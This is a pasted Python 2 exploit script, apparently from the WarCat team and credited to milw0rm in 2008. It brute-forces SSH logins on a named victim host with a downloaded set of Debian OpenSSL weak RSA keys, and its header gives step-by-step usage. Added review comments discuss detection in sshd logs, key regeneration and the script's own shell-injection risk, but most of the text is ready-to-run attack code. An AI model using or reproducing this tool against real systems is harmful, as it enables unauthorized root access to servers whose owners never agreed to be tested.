
Untitled

a guest
Apr 17th, 2014
  1. #!/bin/python
  2. # This program is free software; you can redistribute it and/or modify
  3. # it under the terms of the GNU General Public License as published by
  4. # the Free Software Foundation; either version 2 of the License, or
  5. # (at your option) any later version.
  6. #
  7. # This program is distributed in the hope that it will be useful,
  8. # but WITHOUT ANY WARRANTY; without even the implied warranty of
  9. # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  10. # GNU General Public License for more details.
  11. #
  12. # You should have received a copy of the GNU General Public License
  13. # along with this program; if not, write to the Free Software
  14. # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
  15. # MA 02110-1301, USA.
  16. ############################################################################
  17. # Autor: hitz - WarCat team (warcat.no-ip.org)
  18. # Collaborator: pretoriano
  19. #
  20. # 1. Download http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
  21. #
  22. # 2. Extract it to a directory
  23. #
  24. # 3. Execute the python script
  25. # - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
  26. # - execute: python exploit.py (without parameters) to display the help
  27. # - if the key is found, the script shows something like that:
  28. # Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
  29. # Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
  30. ############################################################################
  31.  
  32.  
  33. import Queue
  34. import os
  35. import string
  36. import time
  37. from threading import Thread
  38. import sys
  39.  
class End():
    """Shared stop flag, raised once any worker thread reports a matching key."""

    def __init__(self):
        # Starts cleared; only Finish() ever changes it.
        self.end = False

    def Finish(self):
        """Mark the search as over so the workers and the main loop stop."""
        self.end = True

    def GetEnd(self):
        """Return True after Finish() has been called, False before."""
        return self.end
  50.  
  51.  
# Worker thread. Each instance takes private-key filenames from the shared
# queue and runs one `ssh` login attempt per file against a single host/user.
# NOTE(review): the nesting below is reconstructed from a paste that lost its
# indentation -- confirm against the original script.
class Connection(Thread):
    def __init__(self,QueueDir,TheEnd,dir,host,user,port='22'):
        """Store the shared queue, the shared stop flag and the target settings.

        QueueDir -- queue of key filenames still to be tried
        TheEnd   -- object exposing Finish()/GetEnd(), shared by all workers
        dir      -- directory holding the key files (joined with '/' in run())
        host, user, port -- concatenated into the ssh command line as strings;
                            port defaults to '22'
        """
        Thread.__init__(self)
        self.QueueDir = QueueDir
        self.TheEnd = TheEnd
        self.dir = dir
        self.host = host
        self.user = user
        self.port = port

    def run(self):
        """Try queued keys until the queue is empty or the stop flag is set."""
        while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):
            key = self.QueueDir.get()

            # The command line is built by plain string concatenation and run
            # through os.popen3 (Python 2 only). The trailing '; echo $?' shows
            # it is interpreted by a shell, so shell metacharacters in user,
            # port, dir, host or a key filename would be interpreted as well.
            # NOTE(review): that is a risk to whoever runs this against a key
            # directory unpacked from an archive they do not control.
            cmd = 'ssh -l ' + self.user
            cmd = cmd + ' -p ' + self.port
            # Password authentication is switched off for the attempt, and the
            # key file is passed with -i.
            # NOTE(review), defender's view: every iteration is a separate ssh
            # connection, so the target's sshd log would be expected to show a
            # burst of failed public-key authentications from one source
            # address; connection rate limiting and alerting on that pattern
            # apply here.
            cmd = cmd + ' -o PasswordAuthentication=no'
            cmd = cmd + ' -i ' + self.dir + '/' + key
            # Remote command is just 'exit'; the local shell then prints ssh's
            # exit status, which is what gets read from pout below.
            cmd = cmd + ' ' + self.host + ' exit; echo $?'

            pin,pout,perr = os.popen3(cmd, 'r')
            pin.close()

            # To debug, uncomment the next line. This will show the errors reported by ssh
            #print perr.read()

            # An exit status of '0' is treated as a successful login with this key.
            if pout.read().lstrip().rstrip() == '0':
                # Raise the shared flag so the other workers and the main loop stop.
                self.TheEnd.Finish()
                print ''
                print 'Key Found in file: '+ key
                print 'Execute: ssh -l%s -p%s -i %s/%s %s' %(self.user,self.port,self.dir,key,self.host)
                print ''
  85.  
# Script entry: print the banner, read the command line, queue the candidate
# key files, start the worker threads and report progress until done.
# NOTE(review): the nesting below is reconstructed from a paste that lost its
# indentation -- confirm against the original script.
print '\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org'

# Fewer than three positional arguments: print usage and exit with status 1.
if len(sys.argv) < 4:
    print './exploit.py <dir> <host> <user> [[port] [threads]]'
    print ' <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash'
    print ' <host>: The victim host'
    print ' <user>: The user of the victim host'
    print ' [port]: The SSH port of the victim host (default 22)'
    print ' [threads]: Number of threads (default 4) Too big numer is bad'

    sys.exit(1)

# Note: 'dir' shadows the builtin of the same name for the rest of the script.
dir = sys.argv[1]
host = sys.argv[2]
user = sys.argv[3]

# Optional arguments. port is kept as a string in every branch; threads is the
# int 4 by default but a string when taken from argv (converted with int() below).
if len(sys.argv) <= 4:
    port='22'
    threads=4
else:
    if len(sys.argv) <=5:
        port=sys.argv[4]
        threads = 4

    else:
        port=sys.argv[4]
        threads = sys.argv[5]

# No error handling around os.listdir: a missing or unreadable directory ends
# the script with an uncaught exception.
# NOTE(review), defender's view: the candidates are a fixed directory of
# pre-generated keys (the file header points at a Debian RSA-2048 key archive),
# so only accounts whose authorized_keys still lists a key from that weak set
# are exposed. Regenerating such keys, removing them from authorized_keys and
# checking existing keys with a weak-key blacklist tool such as Debian's
# ssh-vulnkey closes this off.
ListDir = os.listdir(dir)
QueueDir=Queue.Queue()
TheEnd = End()

# Queue every directory entry whose name does not contain '.pub' anywhere.
for i in range(len(ListDir)):
    if ListDir[i].find('.pub') == -1:
        QueueDir.put(ListDir[i])

initsize = QueueDir.qsize()
tested = 0

# Start the workers; all of them share the same queue and stop flag.
for i in range(0,int(threads)):
    Connection(QueueDir,TheEnd,dir,host,user,port).start()


# Progress loop: wake every 5 seconds until the flag is set or the queue is
# empty. 'tested' counts entries taken off the queue, not attempts that have
# finished, and 'speed' is the number dequeued in the last interval divided by 5.
while (not TheEnd.GetEnd()) and (not QueueDir.empty()):
    time.sleep(5)
    actsize = QueueDir.qsize()
    speed = (initsize - tested - actsize)/5
    tested = initsize - actsize

    print 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' %(tested,actsize,speed)
  136.  
  137. # milw0rm.com [2008-06-01]